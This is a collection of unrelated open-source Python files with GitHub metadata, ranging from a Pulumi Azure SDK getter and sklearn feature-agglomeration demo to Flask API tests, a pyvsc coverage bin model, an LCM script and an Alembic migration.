/sdk/python/pulumi_azure_native/appconfiguration/get_private_endpoint_connection.py
|
f7cc2cd97bd2658bf9e3e438d054acac99b5aaaf
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
MisinformedDNA/pulumi-azure-native
|
9cbd75306e9c8f92abc25be3f73c113cb93865e9
|
de974fd984f7e98649951dbe80b4fc0603d03356
|
refs/heads/master
| 2023-03-24T22:02:03.842935
| 2021-03-08T21:16:19
| 2021-03-08T21:16:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,437
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
    """
    A private endpoint connection
    """
    # NOTE: generated code ("do not edit by hand").  The constructor
    # type-checks each field and stores it via pulumi.set(); the typed
    # @property getters below read the stored values back with pulumi.get().
    def __init__(__self__, id=None, name=None, private_endpoint=None, private_link_service_connection_state=None, provisioning_state=None, type=None):
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if private_endpoint and not isinstance(private_endpoint, dict):
            raise TypeError("Expected argument 'private_endpoint' to be a dict")
        pulumi.set(__self__, "private_endpoint", private_endpoint)
        if private_link_service_connection_state and not isinstance(private_link_service_connection_state, dict):
            raise TypeError("Expected argument 'private_link_service_connection_state' to be a dict")
        pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The resource ID.
        """
        return pulumi.get(self, "id")
    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the resource.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="privateEndpoint")
    def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
        """
        The resource of private endpoint.
        """
        return pulumi.get(self, "private_endpoint")
    @property
    @pulumi.getter(name="privateLinkServiceConnectionState")
    def private_link_service_connection_state(self) -> 'outputs.PrivateLinkServiceConnectionStateResponse':
        """
        A collection of information about the state of the connection between service consumer and provider.
        """
        return pulumi.get(self, "private_link_service_connection_state")
    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        The provisioning status of the private endpoint connection.
        """
        return pulumi.get(self, "provisioning_state")
    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of the resource.
        """
        return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
    # Makes the result usable with `await` in async Pulumi programs.
    # __await__ never actually suspends: the `if False: yield` merely marks
    # the method as a generator; it returns the already-resolved result.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetPrivateEndpointConnectionResult(
            id=self.id,
            name=self.name,
            private_endpoint=self.private_endpoint,
            private_link_service_connection_state=self.private_link_service_connection_state,
            provisioning_state=self.provisioning_state,
            type=self.type)
def get_private_endpoint_connection(config_store_name: Optional[str] = None,
                                    private_endpoint_connection_name: Optional[str] = None,
                                    resource_group_name: Optional[str] = None,
                                    opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
    """
    A private endpoint connection
    API Version: 2020-06-01.
    :param str config_store_name: The name of the configuration store.
    :param str private_endpoint_connection_name: Private endpoint connection name
    :param str resource_group_name: The name of the resource group to which the container registry belongs.
    """
    # Marshal the arguments into the camelCase keys the provider expects.
    __args__ = dict()
    __args__['configStoreName'] = config_store_name
    __args__['privateEndpointConnectionName'] = private_endpoint_connection_name
    __args__['resourceGroupName'] = resource_group_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the provider function and unpack the typed result.
    __ret__ = pulumi.runtime.invoke('azure-native:appconfiguration:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
    return AwaitableGetPrivateEndpointConnectionResult(
        id=__ret__.id,
        name=__ret__.name,
        private_endpoint=__ret__.private_endpoint,
        private_link_service_connection_state=__ret__.private_link_service_connection_state,
        provisioning_state=__ret__.provisioning_state,
        type=__ret__.type)
|
[
"noreply@github.com"
] |
MisinformedDNA.noreply@github.com
|
f9b5b697037e33f9f12b027bc0b5b2c9630275de
|
18d223e5ea590e60bc791987034276eed2651721
|
/sk1-tt/lesson2-data-processing/c4-unsupervised-learning/c42_feature_agglomerative.py
|
51862d664f81bccb84812f300309511d5d5b2662
|
[] |
no_license
|
sonicfigo/tt-sklearn
|
83b419b4f8984fc63ef41bf2af5b682477350992
|
8e473e958b0afc6154ba3c4dee818fd4da8f504b
|
refs/heads/master
| 2020-03-26T16:07:59.758723
| 2018-09-25T06:28:47
| 2018-09-25T06:28:47
| 145,084,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
# coding=utf-8
"""
lasso, used earlier, relies on the sparsity technique and can help with the
curse-of-dimensionality problem.
Another approach: feature agglomeration (clustering the *features*; note the
difference from hierarchical clustering, which clusters the data directly).
Regular clustering
    clusters the data according to the features.
Feature agglomeration
    transposes the data and clusters the features instead.
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
digits = datasets.load_digits()
images = digits.images # the images are (1797, 8, 8)
X = np.reshape(images, (len(images), -1)) # (1797, 64)
connectivity = grid_to_graph(*images[0].shape) # (64, 64)
# (The literal below says: "start the feature clustering".)
"""
开始特征聚类
"""
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
                                     n_clusters=32)
agglo.fit(X)
# (The literal below says: X (1797, 64) is reduced to X_reduced (1797, 32);
# the two FeatureAgglomeration methods to watch are 1. transform and
# 2. inverse_transform.)
"""
X (1797,64)
缩减到
X_reduced (1797, 32)
FeatureAgglomeration 实例的两个方法要关注:
1. transform
2. inverse_transform
"""
X_reduced = agglo.transform(X) # (1797, 32)
X_approx = agglo.inverse_transform(X_reduced) # (1797, 64)
images_approx = np.reshape(X_approx, images.shape) # (1797, 8, 8)
print(images_approx.shape)
IMG_INDEX = 23
plt.figure(1)
print(images[IMG_INDEX])
print(np.unique(images[IMG_INDEX]))
plt.imshow(images[IMG_INDEX])
# The Chinese print below notes that, to the naked eye, the 64-feature
# original and the 32-feature reconstruction look essentially the same.
print('\n===================肉眼看,原图像feature 64的,与压缩图像feature 32的,没什么区别啊')
plt.figure(2)
print(images_approx[IMG_INDEX])
print(np.unique(images_approx[IMG_INDEX]))
plt.imshow(images_approx[IMG_INDEX])
plt.show()
|
[
"sonic821113@gmail.com"
] |
sonic821113@gmail.com
|
5419f9bd1ab6510ad576878fcae58ddc84a24b7c
|
1a114943c92a5db40034470ff31a79bcf8ddfc37
|
/stdlib_exam/os-path-expandvars-example-1.py
|
b2b9b437176caf6eedbc4bca41e3855d1d665823
|
[] |
no_license
|
renwl/mylinux
|
1924918599efd6766c266231d66b2a7ed6f6cdd1
|
0602fc6d2b0d254a8503e57310f848fc3e1a73b4
|
refs/heads/master
| 2020-07-10T22:12:03.259349
| 2017-01-02T12:32:04
| 2017-01-02T12:32:04
| 66,467,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 167
|
py
|
# NOTE: Python 2 syntax (print statements); under Python 3 these would be
# print() calls.  Demonstrates os.path.expandvars substituting $USER.
import os
os.environ["USER"] = "user"  # force a known value so the output is predictable
print os.path.expandvars("/home/$USER/config")
print os.path.expandvars("$USER/folders")
## /home/user/config
## user/folders
|
[
"wenliang.ren@quanray.com"
] |
wenliang.ren@quanray.com
|
f29d9ae762e6121f945faa8462bdcac0b729d598
|
9b422078f4ae22fe16610f2ebc54b8c7d905ccad
|
/xlsxwriter/test/vml/test_write_fill.py
|
27a23de9f742660fba4a29b9a6d8916f3102aaa4
|
[
"BSD-2-Clause-Views"
] |
permissive
|
projectsmahendra/XlsxWriter
|
73d8c73ea648a911deea63cb46b9069fb4116b60
|
9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45
|
refs/heads/master
| 2023-07-21T19:40:41.103336
| 2023-07-08T16:54:37
| 2023-07-08T16:54:37
| 353,636,960
| 0
| 0
|
NOASSERTION
| 2021-04-01T08:57:21
| 2021-04-01T08:57:20
| null |
UTF-8
|
Python
| false
| false
| 993
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...vml import Vml
class TestWriteVfill(unittest.TestCase):
    """Unit tests for the Vml fill-element writers."""

    def setUp(self):
        # Route the VML writer's output into an in-memory buffer so each
        # test can inspect exactly what was written.
        self.fh = StringIO()
        self.vml = Vml()
        self.vml._set_filehandle(self.fh)

    def test_write_comment_fill(self):
        """Test the _write_comment_fill() method"""
        self.vml._write_comment_fill()

        expected = """<v:fill color2="#ffffe1"/>"""
        actual = self.fh.getvalue()
        self.assertEqual(actual, expected)

    def test_write_button_fill(self):
        """Test the _write_button_fill() method"""
        self.vml._write_button_fill()

        expected = """<v:fill color2="buttonFace [67]" o:detectmouseclick="t"/>"""
        actual = self.fh.getvalue()
        self.assertEqual(actual, expected)
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
6b249119fe1fb273f634b04060a01fd3b1d39ab2
|
74091dce735f281188d38d2f00d1a68e1d38ff7a
|
/des_pattern/solid/open_closed_products.py
|
580caa39d9c24cf86d03055117d399a49d6ebe4b
|
[] |
no_license
|
nbiadrytski-zz/python-training
|
96741aa0ef37bda32d049fde5938191025fe2924
|
559a64aae2db51e11812cea5ff602f25953e8070
|
refs/heads/master
| 2023-05-07T04:08:23.898161
| 2019-12-10T12:12:59
| 2019-12-10T12:12:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,252
|
py
|
from enum import Enum
from abc import ABCMeta, abstractmethod

# Open/Closed principle:
# a class should be open for extension (usually via inheritance) but closed
# for modification -- instead of changing something that already works
# properly, extend the behaviour in a new class.


class Color(Enum):
    RED = 1
    GREEN = 2
    BLUE = 3


class Size(Enum):
    SMALL = 1
    MEDIUM = 2
    LARGE = 3


class Product:
    """A named item with a color and a size."""

    def __init__(self, name, color, size):
        self.name = name
        self.color = color
        self.size = size


# Enterprise patterns: Specification (inheritance)
class Spec(metaclass=ABCMeta):
    """Predicate interface over items."""

    @abstractmethod
    def is_satisfied(self, item):
        """Does an item satisfy the requirement?"""
        pass


class Filter(metaclass=ABCMeta):
    """Interface for selecting items that satisfy a specification."""

    @abstractmethod
    def filter(self, items, spec):
        pass


class ColorSpec(Spec):
    """Matches items of one particular color."""

    def __init__(self, color):
        self.color = color

    def is_satisfied(self, item):
        return self.color == item.color


class SizeSpec(Spec):
    """Matches items of one particular size."""

    def __init__(self, size):
        self.size = size

    def is_satisfied(self, item):
        return self.size == item.size


class CombinedSpec(Spec):
    """Logical AND of two specifications."""

    def __init__(self, spec1, spec2):
        self.spec2 = spec2
        self.spec1 = spec1

    def is_satisfied(self, item):
        return self.spec1.is_satisfied(item) and self.spec2.is_satisfied(item)


class ProductFilter(Filter):
    """Lazily yields the items that satisfy the given specification."""

    def filter(self, items, spec):
        return (item for item in items if spec.is_satisfied(item))


apple = Product('Apple', Color.GREEN, Size.SMALL)
tree = Product('Tree', Color.GREEN, Size.LARGE)
house = Product('House', Color.BLUE, Size.LARGE)
products = [apple, tree, house]

prod_filter = ProductFilter()

print('Green products:')
green = ColorSpec(Color.GREEN)
for p in prod_filter.filter(products, green):
    print(f' - {p.name} is green')

print('Large products:')
large = SizeSpec(Size.LARGE)
for p in prod_filter.filter(products, large):
    print(f' - {p.name} is large')

print('Large blue items:')
large_blue = CombinedSpec(large, ColorSpec(Color.BLUE))
for p in prod_filter.filter(products, large_blue):
    print(f' - {p.name} is large and blue')
|
[
"Mikalai_Biadrytski@epam.com"
] |
Mikalai_Biadrytski@epam.com
|
a14bb37817d7bb4c8f4df5839311ba45d1fd581c
|
b30e399b7d687833126ebe4f5c8dd4ab49e2a5e7
|
/tests/test_create_user.py
|
3d1601cc2571d55b5034d477d3adc11f4ceda8fd
|
[] |
no_license
|
riquellopes/desafio-python
|
ccd43101403349e5103499a59136c2e00d67d9af
|
f512923b7f4b0fa6f092f31693d4480a241849aa
|
refs/heads/master
| 2021-01-17T17:16:28.486179
| 2016-10-10T12:40:22
| 2016-10-10T12:40:22
| 70,359,863
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,669
|
py
|
import json
def test_should_be_returned_a_valid_dict(test_client, mocker):
    """POST /user with a fresh e-mail returns 201 plus server-generated fields."""
    # Pin the value app.models reads from the environment (presumably the
    # token signing secret) so the test is deterministic -- confirm in app.models.
    os = mocker.patch("app.models.os")
    os.environ.get.return_value = "desafio_python"
    data = {
        "name": "João da Silva",
        "email": "joao@silva.org",
        "password": "hunter2",
        "phones": [{"number": "987654321", "ddd": "21"}]
    }
    response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
    assert response.status_code == 201
    data = json.loads(response.data.decode('utf-8'))
    # The created user must carry all server-generated bookkeeping fields.
    assert "id" in data
    assert "created" in data
    assert "modified" in data
    assert "last_login" in data
    assert "token" in data
def test_should_be_returned_error_message(test_client, mocker):
    """Posting a duplicate e-mail returns 422 with the Portuguese error message."""
    # NOTE(review): the payload is identical to the previous test's, so this
    # appears to depend on that test having already created the user (shared
    # database state / test ordering) -- confirm the fixture scope.
    os = mocker.patch("app.models.os")
    os.environ.get.return_value = "desafio_python"
    data = {
        "name": "João da Silva",
        "email": "joao@silva.org",
        "password": "hunter2",
        "phones": [{"number": "987654321", "ddd": "21"}]
    }
    response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
    assert response.status_code == 422
    data = json.loads(response.data.decode('utf-8'))
    assert data['mensagem'] == "E-mail já existente"
def test_should_be_get_error_message_when_no_data(test_client, mocker):
    """POST /user with an empty body returns 422 and a missing-data message."""
    os = mocker.patch("app.models.os")
    os.environ.get.return_value = "desafio_python"
    response = test_client.post("/user", content_type='application/json')
    assert response.status_code == 422
    data = json.loads(response.data.decode('utf-8'))
    assert data['mensagem'] == "Algumas informações não foram preenchidas."
|
[
"riquellopes@gmail.com"
] |
riquellopes@gmail.com
|
a95da837fce67b1869d7911c2f64fee0ab6ed7c8
|
ee8c4c954b7c1711899b6d2527bdb12b5c79c9be
|
/assessment2/amazon/run/core/controllers/file.py
|
61d9b400b2ea8cc711774fd99be3523dd691a551
|
[] |
no_license
|
sqlconsult/byte
|
02ac9899aebea4475614969b594bfe2992ffe29a
|
548f6cb5038e927b54adca29caf02c981fdcecfc
|
refs/heads/master
| 2021-01-25T14:45:42.120220
| 2018-08-11T23:45:31
| 2018-08-11T23:45:31
| 117,135,069
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
#!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
# Blueprint grouping the routes served under the /file URL prefix.
controller = Blueprint('file', __name__, url_prefix='/file')
# Scaffolding for a future title-lookup route, kept commented out (TODO 2):
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
#     if title == 'Republic': # TODO 2
#         return render_template('republic.html') # TODO 2
#     else:
#         pass
|
[
"sqlconsult@hotmail.com"
] |
sqlconsult@hotmail.com
|
a116dd620bfbb78a14a50120bf42574e606bcb13
|
13d222bc3332378d433835914da26ed16b583c8b
|
/tests/challenge22/test_challenge22.py
|
4c076071ad9cc1c5e1409177a3652cf2a89fe86f
|
[] |
no_license
|
mattjhussey/pemjh
|
c27a09bab09cd2ade31dc23fffac07374bea9366
|
2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99
|
refs/heads/master
| 2023-04-16T03:08:59.390698
| 2023-04-08T10:54:00
| 2023-04-08T10:54:00
| 204,912,926
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
""" Tests for challenge22 """
from os.path import abspath, dirname, join
from robber import expect
from pemjh.challenge22 import main
def test_challenge22():
""" Regression testing challenge22 """
name_path = join(dirname(abspath(__file__)), 'names.txt')
with open(name_path, 'r') as name_file:
raw_names = [s.strip() for s in name_file.readlines()]
expect(main(raw_names)).to.eq(871198282)
|
[
"matthew.hussey@googlemail.com"
] |
matthew.hussey@googlemail.com
|
882eec1a180e7b4c69a1f2fb3cb0584d6a0baf0e
|
3f554f2e0ef235d93ecbcbbb2e21132f15ef12fd
|
/venv/Scripts/easy_install-3.7-script.py
|
68156d82a29ee68c2cabcd729c8d29ce9a4302ae
|
[] |
no_license
|
sanii-muthui/password_locker
|
189bb72389734cf59b11f27cf0c71d8d9dc4685a
|
b82ac4e87cc3301827d744f5e346a2737a959262
|
refs/heads/master
| 2022-01-09T08:04:37.240307
| 2019-07-22T09:56:20
| 2019-07-22T09:56:20
| 198,190,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 458
|
py
|
#!C:\Users\sanii\Desktop\password_locker\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
# NOTE: auto-generated setuptools console-script wrapper -- do not edit by hand.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so argv[0] matches the command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
    )
|
[
"muthuisanii@gmail.com"
] |
muthuisanii@gmail.com
|
636f08c92eda47b8eba96db768288a07393f0e21
|
c54f5a7cf6de3ed02d2e02cf867470ea48bd9258
|
/pyobjc/PyOpenGL-2.0.2.01/src/shadow/GL.EXT.separate_specular_color.0001.py
|
f61d2a53884bbcb6d4af41077bbd00d3c40380d1
|
[] |
no_license
|
orestis/pyobjc
|
01ad0e731fbbe0413c2f5ac2f3e91016749146c6
|
c30bf50ba29cb562d530e71a9d6c3d8ad75aa230
|
refs/heads/master
| 2021-01-22T06:54:35.401551
| 2009-09-01T09:24:47
| 2009-09-01T09:24:47
| 16,895
| 8
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,857
|
py
|
# This file was created automatically by SWIG.
# Don't modify this file, modify the SWIG interface instead.
# This file is compatible with both classic and new-style classes.
import _separate_specular_color
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
    # SWIG-generated attribute setter: honours the class's
    # __swig_setmethods__ table and, when `static`, refuses to create
    # brand-new attributes on the instance.
    if (name == "this"):
        if isinstance(value, class_type):
            self.__dict__[name] = value.this
            if hasattr(value,"thisown"): self.__dict__["thisown"] = value.thisown
            del value.thisown
            return
    method = class_type.__swig_setmethods__.get(name,None)
    if method: return method(self,value)
    if (not static) or hasattr(self,name) or (name == "thisown"):
        self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
    # Dynamic variant: always allows creating new attributes.
    return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
    # Attribute getter backed by the class's __swig_getmethods__ table.
    # NOTE: Python 2 raise syntax below -- this generated file predates Python 3.
    method = class_type.__swig_getmethods__.get(name,None)
    if method: return method(self)
    raise AttributeError,name
import types
try:
    # Classic SWIG old-/new-style class compatibility shim.
    _object = types.ObjectType
    _newclass = 1
except AttributeError:
    class _object : pass
    _newclass = 0
del types
# Re-export the wrapped extension's metadata, constants, and init function so
# this shadow module presents them at top level.
__version__ = _separate_specular_color.__version__
__date__ = _separate_specular_color.__date__
__api_version__ = _separate_specular_color.__api_version__
__author__ = _separate_specular_color.__author__
__doc__ = _separate_specular_color.__doc__
GL_LIGHT_MODEL_COLOR_CONTROL_EXT = _separate_specular_color.GL_LIGHT_MODEL_COLOR_CONTROL_EXT
GL_SINGLE_COLOR_EXT = _separate_specular_color.GL_SINGLE_COLOR_EXT
GL_SEPARATE_SPECULAR_COLOR_EXT = _separate_specular_color.GL_SEPARATE_SPECULAR_COLOR_EXT
glInitSeparateSpecularColorEXT = _separate_specular_color.glInitSeparateSpecularColorEXT
__info = _separate_specular_color.__info
|
[
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] |
ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25
|
bb7116e666e458d7ef6f117d052ae161ef3c4f90
|
94b29d5cd65e5783692af9896ea9c983cf182c2f
|
/tests/utilities/test_apply_func_torchtext.py
|
ae919668a77ea9363c816014f05272341ca6622e
|
[
"Apache-2.0"
] |
permissive
|
Programmer-RD-AI/pytorch-lightning
|
5d4ab64a887d0ac7d47987241a3213ae59840616
|
02a675241c826d7720c7e15d6fda3f5da0b28116
|
refs/heads/master
| 2023-08-15T22:04:53.632338
| 2021-10-17T13:47:24
| 2021-10-17T13:47:24
| 413,277,562
| 3
| 0
|
Apache-2.0
| 2021-10-04T04:49:55
| 2021-10-04T04:49:55
| null |
UTF-8
|
Python
| false
| false
| 2,651
|
py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
from pytorch_lightning.utilities.apply_func import move_data_to_device
from tests.helpers.imports import Dataset, Example, Field, Iterator
from tests.helpers.runif import RunIf
def _get_torchtext_data_iterator(include_lengths=False):
    """Build a tiny torchtext Iterator (three short text examples) and its Field.

    With ``include_lengths=True`` each batch carries a (data, lengths) tensor
    pair, which is the case the device-move tests below exercise.
    """
    text_field = Field(
        sequential=True,
        pad_first=False,  # nosec
        init_token="<s>",
        eos_token="</s>",  # nosec
        include_lengths=include_lengths,
    )  # nosec
    example1 = Example.fromdict({"text": "a b c a c"}, {"text": ("text", text_field)})
    example2 = Example.fromdict({"text": "b c a a"}, {"text": ("text", text_field)})
    example3 = Example.fromdict({"text": "c b a"}, {"text": ("text", text_field)})
    dataset = Dataset([example1, example2, example3], {"text": text_field})
    text_field.build_vocab(dataset)
    # One batch holds all three examples; no shuffling/sorting so the
    # iterator is deterministic.
    iterator = Iterator(
        dataset,
        batch_size=3,
        sort_key=None,
        device=None,
        batch_size_fn=None,
        train=True,
        repeat=False,
        shuffle=None,
        sort=None,
        sort_within_batch=None,
    )
    return iterator, text_field
@pytest.mark.parametrize("include_lengths", [False, True])
@pytest.mark.parametrize("device", [torch.device("cuda", 0)])
@RunIf(min_gpus=1)
def test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, device):
    """Moving a torchtext batch to a device must move every tensor it holds."""
    data_iterator, _ = _get_torchtext_data_iterator(include_lengths=include_lengths)
    data_iter = iter(data_iterator)
    batch = next(data_iter)
    batch_on_device = move_data_to_device(batch, device)
    if include_lengths:
        # tensor with data
        assert batch_on_device.text[0].device == device
        # tensor with length of data
        assert batch_on_device.text[1].device == device
    else:
        assert batch_on_device.text.device == device
@pytest.mark.parametrize("include_lengths", [False, True])
def test_batch_move_data_to_device_torchtext_include_lengths_cpu(include_lengths):
    # Re-run the GPU test on the CPU device, where no special hardware is needed.
    test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, torch.device("cpu"))
|
[
"noreply@github.com"
] |
Programmer-RD-AI.noreply@github.com
|
79321ece6462d20918c9ef544c17a191895225db
|
8bb3bcf914860c20fb4a7163a8e0691cd802dd65
|
/src/vsc/model/coverpoint_bin_single_val_model.py
|
2c3d70c1f5e7480e7a886bb90d2225f0d2d90df9
|
[
"Apache-2.0"
] |
permissive
|
nitinm694/pyvsc
|
8586cc2497f336289fecbfeb9e6dd788f4070b60
|
612de9e6244c685a3df1972e4860abfe35b614e1
|
refs/heads/master
| 2023-07-28T01:49:10.917496
| 2021-09-12T19:06:00
| 2021-09-12T19:06:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,961
|
py
|
# Created on Mar 20, 2020
#
# @author: ballance
from vsc.model.bin_expr_type import BinExprType
from vsc.model.coverpoint_bin_model_base import CoverpointBinModelBase
from vsc.model.expr_bin_model import ExprBinModel
from vsc.model.expr_literal_model import ExprLiteralModel
from vsc.model.rangelist_model import RangelistModel
class CoverpointBinSingleValModel(CoverpointBinModelBase):
    """Coverpoint bin that is hit by exactly one target value."""

    def __init__(self, name, target_val : int):
        super().__init__(name)
        self.target_val = target_val
        self.n_bins = 1

    def finalize(self, bin_idx_base:int)->int:
        """Record this bin's global index base; a single-value bin uses one slot."""
        super().finalize(bin_idx_base)
        return 1

    def get_bin_expr(self, bin_idx):
        """Builds expressions to represent the values in this bin"""
        expr = ExprBinModel(
            self.cp.target,
            BinExprType.Eq,
            ExprLiteralModel(self.target_val, False, 32)
        )
        return expr

    def get_bin_name(self, bin_idx):
        return self.name

    def sample(self):
        """Mark the bin hit when the coverpoint's current value equals the target.

        Returns the local hit index (0) or -1 on a miss.
        """
        val = self.cp.get_val()
        if val == self.target_val:
            self.hit_bin_idx = 0
            self.cp.coverage_ev(self.bin_idx_base)
        else:
            self.hit_bin_idx = -1
        return self.hit_bin_idx

    def get_bin_range(self, idx):
        # BUG FIX: removed a stray debug print() that wrote
        # "get_bin_range: <idx>" to stdout on every call from library code.
        return RangelistModel([self.target_val])

    def accept(self, v):
        # Visitor-pattern dispatch hook.
        v.visit_coverpoint_bin_single(self)

    def equals(self, oth)->bool:
        """Structural equality: same model type and same target value."""
        eq = isinstance(oth, CoverpointBinSingleValModel)
        if eq:
            eq &= self.target_val == oth.target_val
        return eq

    def clone(self)->'CoverpointBinSingleValModel':
        """Return a copy of this bin, cloning the source-info when present."""
        ret = CoverpointBinSingleValModel(self.name, self.target_val)
        ret.srcinfo_decl = None if self.srcinfo_decl is None else self.srcinfo_decl.clone()
        return ret
|
[
"matt.ballance@gmail.com"
] |
matt.ballance@gmail.com
|
20891c001bfbe780b1f4865470d6788401eefa16
|
ce196aba0adde47ea2767eae1d7983a1ef548bb8
|
/求n,m的最小公倍数.py
|
8ff00c68cb9f7a31cebbfb654fe4a258fce95226
|
[] |
no_license
|
xiang-daode/Python3_codes
|
5d2639ffd5d65065b98d029e79b8f3608a37cf0b
|
06c64f85ce2c299aef7f9311e9473e0203a05b09
|
refs/heads/main
| 2023-08-30T14:59:55.123128
| 2021-11-03T05:12:24
| 2021-11-03T05:12:24
| 333,632,892
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 296
|
py
|
# Compute the least common multiple of n and m.
import math


def gbs(x, y):
    """Print and return the least common multiple of x and y.

    BUG FIX: the original divided out shared factors with a downward loop
    over range(z-1, 2, -1), which never tries the factor 2 and only divides
    each factor out once, so e.g. gbs(4, 6) printed 24 instead of 12.  The
    exact identity lcm(x, y) = x*y // gcd(x, y) is used instead; the result
    is now always an int (the old x/i produced floats).
    """
    g = math.gcd(x, y)
    f = x * y // g if g else 0  # lcm(0, 0) == 0
    print(f)
    return f


if __name__ == "__main__":
    # Read the two integers only when run as a script, not on import.
    n = int(input())
    m = int(input())
    gbs(n, m)
|
[
"noreply@github.com"
] |
xiang-daode.noreply@github.com
|
3d6ade2c6dbc770b827d650cd0b41c4c9c3b901e
|
d9ccb2b8e549a594bf06868391481ea8669786ea
|
/migrations/versions/9320d2f7765b_add_source_file.py
|
c10af5965a24672f6ca7c873edbb88c525eefb10
|
[
"Apache-2.0"
] |
permissive
|
clld/dogonlanguages
|
00dd3895dffbb99c048f0d0a8970d6cd4199ff5c
|
2b0b510e853b77c9e356a9c73142401afc93b04a
|
refs/heads/master
| 2022-12-13T02:33:10.590590
| 2022-12-02T08:34:24
| 2022-12-02T08:34:24
| 25,243,999
| 1
| 2
|
Apache-2.0
| 2021-12-07T13:25:46
| 2014-10-15T07:39:00
|
Python
|
UTF-8
|
Python
| false
| false
| 858
|
py
|
# coding=utf-8
"""add source file
Revision ID: 9320d2f7765b
Revises: 1770d17056aa
Create Date: 2017-05-05 09:58:20.128175
"""
from alembic import op
from clld.db.migration import Connection
from clld.db.models.common import Source, Source_files
# revision identifiers, used by Alembic.
revision = '9320d2f7765b'
down_revision = '1770d17056aa'
def upgrade():
    """Attach the comparative-vocabulary spreadsheet to source 'heathetal2015'."""
    conn = Connection(op.get_bind())
    # Primary key of the existing bibliography record the file hangs off of.
    spk = conn.pk(Source, 'heathetal2015')
    conn.insert(
        Source_files,
        jsondata={
            "thumbnail": None,
            "web": None,
            "size": 7531008,
            "objid": "EAEA0-C97A-A1D2-2E76-0",
            "original": "a.xls"},
        id='heathetal2015-1',
        name='Dogon.comp.vocab.UNICODE.xls',
        ord=1,
        mime_type='application/vnd.ms-excel',
        object_pk=spk)
def downgrade():
    # Intentionally a no-op: the attached file row is not removed on downgrade.
    pass
|
[
"xrotwang@googlemail.com"
] |
